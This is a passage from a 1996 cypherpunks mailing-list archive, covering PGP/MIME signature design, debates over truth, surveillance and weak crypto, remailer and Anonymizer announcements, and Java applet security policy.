believing one thing or another.

As I said above, I think we're right, and to me that means believing that
we'd come out on top in a fair fight.  It seems to me that we ought to
figure out how to set up a few of them and do whatever we can to get the
other side to show up.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@Hrnowl.LoneStar.ORG>
Date: Fri, 24 May 1996 16:33:42 +0800
To: elkins@antares.aero.org (Michael Elkins)
Subject: Transfer encoding indpendant signatures. Was (considered harmful.)
In-Reply-To: <199605230403.VAA14508@zzyzx.aero.org>
Message-ID: <31a50db6.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 
> Your last two comments really illustrate the divison that we've previously
> seen on the pgp-mime list.  On the one side you have those who want to
> include the MIME headers in the digital signature, and on the other are those
> who want the signature to be over the data in it's "binary" (unencoded)
> form.  I _do_ see merit in the latter.  However, that was not the goal of
> my draft.  What I've been trying to get across is that my draft does not
> preclude you from writing your own draft on how to transmit detached
> signatures along with your message (perhaps something like
> multipart/pgp-signed).

OK, it's not PGP MIME's department. Still, I hope that someone will
develop a spec for doing the other, because as my examples show,
some users may need that ability. If specs & software for easy of
use with PGP & mail and widely available, it will tend to entrench
the use of PGP and encryption.


> 
> > Pressure will build for PGP MIME to support binary datapaths.
> 
> When this occurs, I will glady remove that restriction.

The problem is that the transision will occur gradually.
At what point do you tell one class of users that they
are out of luck, in order to better serve another kind of
user? Ten percent? Five percent? One percent? A tenth of a percent?
They will scream bloody murder.

What if you want to send signed mail to a mailing list that includes
users of both kinds of users. Your message will go to a
large number of people, so there is reason for efficiency. Do
you want to send two kinds of messages to users depending
on what kind of transfer they have available?

It is time to invent  transfer-encoding-independant signatures!

We are assuming that the user trusts the pgp-mime software
to specify what will be signed, so that my previous objection
to signing arbitary objects has been ruled out of order.

We want to invent a method of "signing" a complex mime object
that will detect any modification of the information the user is trying
to convey, but will allows us to change the transfer encoding
of a body part without invalidating the "signature".

What we need is a computable map M from the class of mime
objects to a class of "binary signature objects". (Which are basicly
streams of bytes which can be fed into PGP to generate or check a 
signature). ( Don't tell me there is this wierd machine that can not
represent a stream of bytes. PGP assumes that many of its files
are streams of bytes, so that such a machine can not run PGP
to generate or check a signatures and everything with respect
to signatures becomes mute.)


      CLASS OF
      MIME OBJECTS    ======= M ========> BINARY SIGNATURE
                                                    OBJECTS.

M should have the following properties:

 1) Any change in the "message" that the user wants to convey
       will change the object that it maps to under M.
 2) We can change the way a body part is transfer-encoded without
       changing the signature object it maps to under M.

Note: These binary signature objects are not going to be used to
transfer data. They are not going to be used to display information.
They are only going to be used to generate and check signatures.

Given such an M, is is possible to define a method of signing
a MIME object, that will detect any change to the "message",
but not invalidate the signature when changing how a body
part is transfer encoded.

To generate a signature, apply M and generate a PGP binary signature
on the result. To check a signature, apply M and PGP signature
check the result. It should work.

Is it possible to define such a map M? I think so, but I am not
100% certain on the details. Something approximately similar to
the following should work:

Go thru the object copying header lines as a stream of ascii bytes,
seperated UNIX style with linefeeds. Except, do not copy the transfer-encoding
lines or the delimiter fields. Or any other field that only serves to tell how
the object is transfer encoded. Convert the body parts themselves to
a stream of bytes as specified by the transfer-encoding field and
included in the outgoing stream. For text encoding, trailing white
space could be handled as per the draft. Other text canonicalization
as PGP does it. I believe that this method has the two properties 
mentioned above. Perhaps it needs to be somewhat modified.

I am sure that such a map M can be defined if smart people think about it.
- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: cp850

iQCVAgUBMaUbTPBUQYbUhJh5AQEsLQQAnugKr8rQdJi1F6EKxG9slMjVaQcVl9i4
N0azwKH46sIStm7/t8aWu2QnvosFLszt0/jD+NvQqgRU2XwlB/ynDChiMz9yANvy
1rd44r8rVIFZF3zyP9zxgJR+L8liQ/YdwLfEJTHk6Z1pFRMCoYz6Hs7nqvMDSvoc
jmhZQ7Z26AU=
=iKTw
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Fri, 24 May 1996 21:31:01 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Truth can sometimes be harmful...(talk.cpunks.truth)
Message-ID: <01BB491B.4E7D4DC0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


There are small truths and "big" truths - or the smaller parts of a whole, or the smaller ingredients of a complete context.   

In the larger context of complete truth, although the small truth of the location where Anne Frank was hiding was harmful to her safety, it was harmful only because those who had created the war surrounding her were not prepared (did not want) to see the larger truths of reality.

In the context of such an attitude inimical to complete truth, any truth can become a threat to safety.

Analogous to the use of any weapon or tool of destruction it is not accurate to hold the truth at fault, but rather the one who interprets it and decides on what action to take based upon it.  

This reminds me of those arguments on the list where that old objection against encrypting personal messages was brought up:  "what have you got to hide?", implying: do you fear the truth, do you mean to live outside the context of honesty and truth?  And the cypherpunks would counter, no - we just want to be particular about who receives it.


     ..
Blanc







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Fri, 24 May 1996 22:38:29 +0800
To: Mixmaster Mailing List <alt.privacy.anon-server@myriad.alias.net
Subject: New type2.list/pubring.mix
Message-ID: <Pine.NEB.3.93.960524054211.11207B-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	There is a new type2.list/pubring.mix combination on jpunix.com
that reflects the retirement of the nsa (omaha) remailer. It's available
by Web and by anon FTP.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMaWTF1OTpEThrthvAQHg5AP9Hi66SmUpFYUQrDHjRXQnWKQpc7yXTsaJ
rpaaHjd4TIr0mCbVm0ZXfDMq9r/igrqDX6SzCGUDvBxxsumcBCKCNJ59EpSOCcPM
e2I3v3MSwapaLe/8/5Ztk81IvUVhnyzkctEW11w+S7hk6ZCU2nz5yFL4AkASgPrk
SP0WxYyA1mA=
=jM6N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daemon@anon.penet.fi
Date: Fri, 24 May 1996 15:58:20 +0800
To: cypherpunks@toad.com
Subject: Anonymous password assignment failure (no password)
Message-ID: <9605240440.AA28627@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


You have requested the assignment of a new password
However, your message text didn't contain any password.
Remember that passwords should only contain letters and numbers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 25 May 1996 07:32:25 +0800
To: Jim Choate <ravage@ssz.com>
Subject: PILATE SAYETH UNTO HIM...
In-Reply-To: <199605240530.AAA23158@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.960524072314.8972A-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 24 May 1996, Jim Choate wrote:

> Sorry but the very fact that I don't agree with you is proof enough that
> there is no absolute 'Truth' as you use it. 

It isn't obvious that we DON"T agree.  It was still a question.
Actually, I rather fancied Bell and May's responses.  To the
extent we do disagree reflects in no way on the Truth, only in
our abilities to determine what Truth is.  Again, think of it
as an archetype or reality not as a popularity contest.

> That is  unless you are attempting to claim absolute omnipotence
> on the point of determination. 

Nope, not me.  Hell, I don't even claim *partial* omnipotence.
You really have to pay attention to those details.  Why are you
having so much trouble understanding the question mark?
 
> Nice tactical ploy, an ad hominem buried in a straw man argument.

Thanks, but you got it wrong again.  Yes, there was an indirect
(and apparently valid) ad hominem, but apparently you do not know
what a straw man is.  For your edification, your out-of-left-field
suggestion that my discussion of Truth represents some claim of 
omnipotence on my part is clearly a straw man (and an implied ad
hominem, for good measure).


 S a n d y

...WHAT IS TRUTH?
	
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 24 May 1996 23:52:57 +0800
To: perry@piermont.com
Subject: Re: VIRUS ALERT: Java virus that affects Netscape 2.0 & 2.01.
In-Reply-To: <199605240220.WAA27452@jekyll.piermont.com>
Message-ID: <199605241245.HAA22317@homeport.org>
MIME-Version: 1.0
Content-Type: text



	Hype about Java and a move to a policy based security
mechanism are not incompatible.  Perry's security model will probably
be NO Java, NO Livescript.  Mine might be only Java signed by McAffee
can get more than 3 seconds of CPU time, or access remote network
ports on the server it came from, no other code can run.

Adam


Perry E. Metzger wrote:

| Sadly, Java hype has become a giant industry, and the hype machine
| assures that honesty about Java is going to continue to decline. Java
| has become a major stock booster for Sun and other
| companies. Congenital Java security holes aren't going to get serious
| attention because whether one likes it or not Sun's stock is impacted
| by the whole thing.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 25 May 1996 05:09:10 +0800
To: blanc <blancw@accessone.com>
Subject: RE: Truth can sometimes be harmful...(talk.cpunks.truth)
In-Reply-To: <01BB491B.4E7D4DC0@blancw.accessone.com>
Message-ID: <Pine.SUN.3.91.960524074548.8972B-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 24 May 1996, blanc wrote:

> This reminds me of those arguments on the list where that old
> objection against encrypting personal messages was brought up:  
> "what have you got to hide?", implying: do you fear the truth, 
> do you mean to live outside the context of honesty and truth? 
> And the cypherpunks would counter, no - we just want to be
> particular about who receives it.

This is the most concise and logical response yet, to my
suggested answer of "Truth" to Bell's question.  Blanc has
masterfully shown why that dog won't hunt.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 25 May 1996 06:24:38 +0800
To: cypherpunks@toad.com
Subject: Re: Children's Privacy Act
Message-ID: <adcb2a8e0002100415b1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:45 AM 5/24/96, Rich Graves wrote:

>I recognize that criminalizing the free flow of information is like trying
>to stick your finger in a dike, but every little bit has an effect. In
>this case, I'd call it a positive effect.
>
>I was certainly disappointed to hear a couple of cypherpunks the other day
>discussing for-profit offshore data havens full of personal information
>that is illegal to collect in the US as a business opportunity *they* were
>interested in pursuing. I just can't see myself doing that, for anybody.
>Gubmint or private, doesn't matter.

These off-shore data havens, possibly in Anguilla, possibly elsewhere, have
long been a motivation for crypto anarchy.

"Illegal to collect in the U.S." is the operative phrase.

(P.S. Cf. the sections in my Cyphernomicon for a discussion of how the main
U.S. credit-collecting agencies (TRW Credit, Transunion, and Equifax) have
various cozy relationships with the U.S. government and intelligence
agencies. Many of the laws about collection of data are ignored when
needed. Ask the credit agencies why and how they willingly participate in
the falsification of credit histories, and even the creation of credit
histories out of thin air.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Sat, 25 May 1996 07:00:17 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <v02140b03adcb89cf7df7@[17.128.203.188]>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero writes:
>If I were planning such a briefing I'd probably concentrate on real cases
>that were cracked due to NSA SIGINT - especially terrorist groups
>operating with only limited state sponsorship
>
You might find hints at "the briefing" in some of the recent terrorist-porno
novels by Tom Clancey (for example). Also, "Spike" by Arnaud de Bouchgrave
(apologies for possible misspelling) is an interesting book to read between
the lines

The briefing might go something like this: "Remember the terrorist bombing of
the Libian Embassy? Well, "they" were planning to bomb the <??> embassy,
but we intercepted their messages and prevented the attack.

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sat, 25 May 1996 03:18:17 +0800
To: cypherpunks@toad.com
Subject: Mission Impossible
Message-ID: <96May24.090930edt.1570@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


I saw Mission Impossible last night.  It deals with some cypherpunks issues,
as the plot centers on anonymous BlackNet style operations on the Internet.
Unfortunately, it does it badly.  Particularly silly is the reference that
a STU-III is a security penetration device.  The main hacker is called
Luthor, though he doesn't look a thing like Lex.  The Usenet is dealt
with in a laughable manner -- a grep of the entire 'net for "Job" doesn't
turn up a single hit.

Having said all of that, lots of things explode.  It's good in THX.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Sat, 25 May 1996 06:25:43 +0800
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION ANNOUNCES WORLDWIDE BETA-TEST OF THE ANONYMIZER
Message-ID: <199605241617.JAA03283@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release - May 24, 1996
Contact: Sameer Parekh 510-601-9777x3

	 COMMUNITY CONNEXION ANNOUNCES WORLDWIDE BETA-TEST OF
			    THE ANONYMIZER

BERKELEY, CA - Community ConneXion, Inc., The Internet Privacy
Provider, announced today the worldwide Beta release of the
"Anonymizer" service for the World-Wide-Web.

The Anonymizer allows people browsing the web to be completely
anonymous when making web transactions.  It protects people from
having the sites they visit discover their email address, hostname,
type of computer, and other potentially sensitive information.

"The Anonymizer finally brings Caller-ID-Block to the Internet," said
Justin Boyan, who designed and implemented the system.  "If you don't
want records of your activities being kept by every web site you
visit, you should definitely be using this service."

Community ConneXion ("C2") is glad to be able to provide such a
service to the Internet community free of charge.  C2's President,
Sameer Parekh, commented on the availability of this service, "We feel
that people's privacy is too important to make people pay directly for
basic privacy services.  Therefore, we've built The Anonymizer with a
model that will allow people on the Internet to use the basic level of
service at no charge."

Future enhancements to the system include support for Netscape's
Secure Sockets Layer, which will provide web surfers with the ability
not only to hide their identity from the remote site, but to hide the
identity of the sites they are browsing from their employer,
university, or ISP.  The threat of a university clamping down on the
ability of its students to browse the web freely is very strong, and
C2 plans to make this service available in order to protect against
such threats.

The Anonymizer can be accessed at http://www.anonymizer.com/.  Users
need only click on "BEGIN SURFING ANONYMOUSLY" and then choose a site
to visit anonymously.  All their web transactions from that point on
are anonymized. As the service is only in Beta phase at this point,
users may experience slow connections or downtime. As the service
moves to Production release, these problems will be eliminated.

Community ConneXion is the leading provider of privacy on the
Internet. They provide anonymous and pseudonymous internet access and
web pages in addition to powerful web service, virtual hosts, and web
design consultation. Information is available from their web pages at
http://www.c2.net/.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 25 May 1996 06:53:47 +0800
To: cypherpunks@toad.com
Subject: Re: Cyber-Anarchy
Message-ID: <199605241644.JAA01750@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:14 PM 5/23/96 -0700, Timothy C. May wrote:

>My point is actually not so much one of claiming credit for something I've
>been involved with since 1988, as being somewhat critical of the
>all-too-common tendency I see of _renaming_ something without adding any
>new content.
>
>Jim Bell calls his set of ideas "cyber-anarchy," and certain journalists
>have picked up on this (as with the Australian article).
>
>But with the exception of the one variant of anonymous markets, namely,
>"assassination politics," most or all of the other ideas of his
>"cyber-anarchy" seem to be encompassed by the already-existing term.

I don't tend to carefully distinguish between "crypto-anarchy" and 
"cyber-anarchy" although the former is a subset of the latter.   Also, one 
big influence on society has nothing to do with encryption at all:  The fact 
that people are beginning to get their news and information from other 
ordinary people (as opposed to newspapers and TV networks) is not dependant 
on encryption, at least in a country that's supposed to be blessed with the 
1st amendment.  

The deathgrip the politicians have on the public as a whole will at least 
start to be weakened by non-crypto "cyberanarchy" effects like this, 
although perhaps it would be better named "cyber-minarchy."   I think we can 
attribute the difficulty the establishment is having passing a Clipper-type 
law to the portion of cyberminarchy that has nothing to do with encryption.   

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matt Smith" <msmith@rebound.slc.unisys.com>
Date: Sat, 25 May 1996 07:27:54 +0800
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: Innocence & harmless weapons
In-Reply-To: <Pine.SUN.3.91.960523212712.26804A-100000@crl8.crl.com>
Message-ID: <199605241552.PAA00821@rebound.slc.unisys.com>
MIME-Version: 1.0
Content-Type: text


Sandy Sandfort was accused of saying:
> C'punks,
> 
> On Thu, 23 May 1996, Jim Choate wrote:
> 
> > Hi Sandy et al.,
> > 
> > Whose side of the truth?
> 
> That was a capital "T", bub.  Truth doesn't have sides.  (Think
> of it as an archetype.)

Not to drag a whole new level of philosophy into this already dragging list,
but Plato disagrees with you.  There is no The Truth.  It's all in 
perception.

>  S a n d y

-- 
Matt Smith - msmith@unislc.slc.unisys.com
"Nothing travels faster than light, with the possible exception of bad news, 
which follows its own rules." - Douglas Adams, "Mostly Harmless"
Disclaimer:  I came up with these ideas, so they're MINE!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 25 May 1996 09:18:27 +0800
To: cypherpunks@toad.com
Subject: Re: The Anti-Briefing...
Message-ID: <adcb2fbb010210044d1b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:12 PM 5/24/96, Peter Wayner wrote:
>I'm sure the "Briefing" is quite impressive and it includes
>several strong arguments for government surveillance. There are
>bound to be more than a few kids that are alive today thanks to
>eavesdropping and the quick thinking of folks in FBI, NSA et al.

I expect The Briefing contains unreleased material about FBI stings and
apprehensions, such as the apprehension of the group planning to shoot down
several airliners in the U.S., the plans to kill Clinton in Manila, etc.

No doubt it cites the killing of Pablo Escobar (the real one, not VZNuri)
because he was using a typically-insecure cellphone. (Though I doubt they
will mention the U.S. involvement in using a cellphone to pinpoint The
Bomber, in Palestine.)

And almost certainly a few juicy tidbits about "pedophile rings using PGP"
(which is almost certainly the case, of course).

The Briefing may also contain hints of intelligence ops which caught
nuclear material smugglers, which prevented CBW attacks such as the Sarin
gas attack in Tokyo, and so on.

(Some of this stuff is "CLASSIFIED," and this probably increases the sex
appeal to the burrowcrats who get The Briefing. A darkened room, a
succession of G-Man accounts of bad guys caught, a glimpse into the world
of SIGINT, some nice dramatic music by Lalo Schifrin, and dire warnings
about What Will Happen When the Bad Guys Get Crypto.)


And so on. As Peter notes, there are undeniably cases where a Surveillance
State can in fact capture terrorists, murderers, abortionists, smokers,
carnivores, and other criminals and thoughtcriminals.

>That being said, I'm sure that there is also an "anti-Briefing"
>that can be given that illustrates that the huge cost of
>redesigning the phone system and forcing businesses and people
>to operate without protection. Here are some examples from the
>recent press that I think are good arguments for why strong
>crypto won't change the status quo.

I agree that there are many examples that could be cited. Here are a few more:

-- the spies and moles within the intelligence agencies, from the Walkers
to Aldrich Ames. Here is an environment in which communications are
ostensibly controlled, in which surveillance is ubiquitous, in which
counterintel teams have wide lattitude to investigate, entrap, etc....and
yet the crimes occurred. (Of course, we don't really know how much worse
the spying would be without such surveillance. But the point is that even
heavy surveillance still lets willing perps find ways.)

-- drug rings have often operated right under the noses of cops, sometimes
out of police stations. (The theme of any number of "Serpico"-type books,
movies, and television shows.)

-- and let us not forget the "Surveillance States" which already exist, or
existed in recent memory. The PRC, implicated in various criminal
activities, the leftist and rightist governments of the world involved in
the drug trade, and so on.

(The point being that even such Surveillance States have plenty of crime,
and often the apparatus of the State is used for criminal purposes.)

-- and so on...

>Some might argue that if weak crypto can save one child's life
>than it is worth it. This is a strong, sentimental argument, but
>it really doesn't reflect the reality of the tradeoff. We could
>spend a lot more money on airlines, trains and cars and save a
>few kids lives, but the cost could be phenomenal. The fact is
>that government enforced weak crypto is a tradeoff. We pay for
>the ease of the police surveillance because we make life simpler
>for crooks who make their living eavesdropping and circumventing
>security systems. The big question is whether the tradeoff is
>worth it.

We can all think of repressive steps which undeniably will save the lives
of some children, babies, old people, mothers, etc.

Banning alcohol, banning smoking, banning sex outside of marriage....

(Some of these were tried, some are even now being tried by do-gooding
statists....)

Where the USA has gone off the beam is in legislating behaviors which are
not directly harmful to others, presumably on the rationale of "the common
good." But freedoms are being taken away daily in this rush to make the USA
a "more pleasant" place. (The movie "Demolition Man" captured this trend
nicely.)

And beware the Law of Unintended Consequences. Mandatory airbags in cars,
for example. They are having the effect that people are not using seat
belts as often as they used to. And inflating airbags are killing children,
probably more than are being saved by the airbags in the first place.

Whoops. Better rethink that "we know what's good for you and we're going to
force you to pay $500 more per car to have it."

Meanwhile, the government pays farmers to grow tobacco....

Are things out of whack, or what?

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 25 May 1996 06:37:41 +0800
To: cypherpunks@toad.com
Subject: Re: Runtime info flow in Java
Message-ID: <v02120d23adcb9961b2ce@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:06 5/23/96, Norman Hardy wrote:

>I am interested in your paper because you define the problem as we do.
>There are some who think that capability architectures are the solution.
>There is little information on how to solve these problems with
>capabilities. I am trying to find time to address some of these issues.

I walked away from your presentation of KeyKOS with the impression that a
capability system to be secure it would have to be implemented at the OS
level.
Can you build a such a system on top of an insecure OS, as Java would have
to do?

TIA,



Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sat, 25 May 1996 05:32:50 +0800
To: cypherpunks@toad.com
Subject: The Anti-Briefing...
Message-ID: <v02140b08adcb6bbc487c@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



I'm sure the "Briefing" is quite impressive and it includes
several strong arguments for government surveillance. There are
bound to be more than a few kids that are alive today thanks to
eavesdropping and the quick thinking of folks in FBI, NSA et al.

That being said, I'm sure that there is also an "anti-Briefing"
that can be given that illustrates that the huge cost of
redesigning the phone system and forcing businesses and people
to operate without protection. Here are some examples from the
recent press that I think are good arguments for why strong
crypto won't change the status quo.

1) A recent video tape on the news showed some convicted bad guy
doing drugs and having sex with one of his convict buddies. They
just happened to be in a side room of the prison that had a
video camera. Some people tried to make political hay by saying
that the prisons were really coddling the prisons too much. But
prisons already have all of the enforcement tools that the
police wish they had. They can strip search people without a
warrant. They can read all of their mail and listen in to all
conversations with visitors who aren't their lawyer. But there
are still drugs in the prison. So how do they expect to
eradicate drugs in the real world?

2) There are persistent rumors that Tim McVeigh et al were under
some sort of surveillance. I know of no facts to back this up.
I've heard some people say that they feel it was part of a sting
operation that failed because the bomb actually went off. Who
knows? But the World Trade Center bombers were under
surveillance and that failed. This doesn't show that
surveillance is bad, it just shows that it isn't perfect.

3) Pachinko machines and cell phones have both used weak crypto.
Whoops. The gangsters figured out how to break the crippled
system.

There must more examples but I'm typing from memory. The point
is that full surveillance rarely stops crime altogether, but it
may make a dent. The question is whether it is worth redesigning
our phone system and computer networks to introduce even more
weakness just because the police can use this weakness.

Some might argue that if weak crypto can save one child's life
than it is worth it. This is a strong, sentimental argument, but
it really doesn't reflect the reality of the tradeoff. We could
spend a lot more money on airlines, trains and cars and save a
few kids lives, but the cost could be phenomenal. The fact is
that government enforced weak crypto is a tradeoff. We pay for
the ease of the police surveillance because we make life simpler
for crooks who make their living eavesdropping and circumventing
security systems. The big question is whether the tradeoff is
worth it.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Sat, 25 May 1996 04:47:11 +0800
To: "cypherpunks@toad.com>
Subject: RE: Truth can sometimes be harmful...
Message-ID: <01BB4959.96BD0E70@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


> >The Truth?
> >
> 
> "The coordinates of Hiroshima are...."
> 
> Q.E.D.

Oh no, can the return of abombpunks be far behind? :-)

regards,
-Blake (who figures if your can't count or measure it, it's an opinion)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Anders B\xdker" <flyvebed@eel.org>
Date: Sat, 25 May 1996 05:33:55 +0800
To: cypherpunks@toad.com
Subject: Re: Children's Privacy Act
In-Reply-To: <adca67d204021004ac12@[205.199.118.202]>
Message-ID: <9605241431.AA0314@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Klaus Jellingestenen" <tcmay@got.net> writes:

  > We at LolitaWatch GMBH are amused...

  > .. we moved our operations to Aalborg, Danmark earlier this year.

  > (Forslag og ideer vedr. indhold modtages gerne af:
  > www@lolita.nordjyllands .dk )

Hmmm, but still incorporated in Germany, huh?

I assume that LolitaWatch Gesellschaft mit beschränkter Haftung will
shortly become LolitaWatch aktieselskab...

Klaus, hvor længe har De haft disse mareridt?

-- 
Anders Bødker





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 25 May 1996 10:55:21 +0800
To: Declan McCullagh <declan@well.com>
Subject: Anarchy Online
In-Reply-To: <Pine.3.89.9605232107.A25751-0100000@well>
Message-ID: <Pine.GUL.3.93.960524104321.29645B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 23 May 1996, Declan McCullagh wrote:

> On Thu, 23 May 1996, Timothy C. May wrote:
> > >At least we now know that the National Journal hasn't heard of
> > >Cyber-Anarchy--- or they didn't understand one word of it.
> > 
> > What is this "cyber-anarchy" (or "Cyber-Anarchy") you keep talking about?
> 
> Heh. Check out http://anarchy-online.dementia.org/book/ for Charles 
> Platt's "Anarchy Online."
> 
> (Did I mention it here before? Charles talks about a few things we've
> discussed here, like the Zundel mirrors, Marty Rimm, and the fight over 
> the CDA.)

Yeah, you'd mentioned it, but I hadn't read it until just now. I see he
mentions me on http://anarchy-online.dementia.org/book/section.2.html, but
my name is badly misspelled; it starts with "R," not "D." Donna's name is
badly misspelled, too, early on. 

I wholeheartedly support his conclusions, by the way. They're based on
a number of incorrect premises, but any fictions are convenient ones. 

http://www.stanford.edu/~ajg/project.html
http://www.c2.org/~rich/Not_By_Me_Not_My_Views/rebuttal.html

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMaX2m43DXUbM57SdAQFnWwP8DZQJL7aNCYR7P8nE/A1oRNI6IaxiUbY/
AqSWhr1WC+HjbE+V+790u7a+C4doMe7Ay+sxTe5jQpuFrExE3hMDPN7xjoxQ9rK/
MTX0pdxKIfyZDQxDV/XaxjtdMn5zH/0Ye6C+hC9QuZ8s++l3y7IuiENwOM6BYNi1
qVuzInNA3OI=
=AWhp
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 25 May 1996 11:03:17 +0800
To: Adam Shostack <perry@piermont.com
Subject: Re: VIRUS ALERT: Java virus that affects Netscape 2.0 & 2.01.
Message-ID: <199605241748.KAA28206@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:45 AM 5/24/96 -0500, Adam Shostack wrote:
>        Hype about Java and a move to a policy based security
>mechanism are not incompatible.  Perry's security model will probably
>be NO Java, NO Livescript.  Mine might be only Java signed by McAffee
>can get more than 3 seconds of CPU time, or access remote network
>ports on the server it came from, no other code can run.

I would like to be able to enforce a policy for Java applet CPU time which
says, the applet can have as much time as it wants/needs constrained by:

(1) I can always determine how much it is using.
(2) I can kill it without killing other processes/threads including the browser.
(3) Without interfering with 1 or 2, I can set its priority in relation to
other programs running on my machine.

In the long term, I would like the ability to sell CPU cycles to Java
applets.  (Or donate cycles to projects I support.)


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
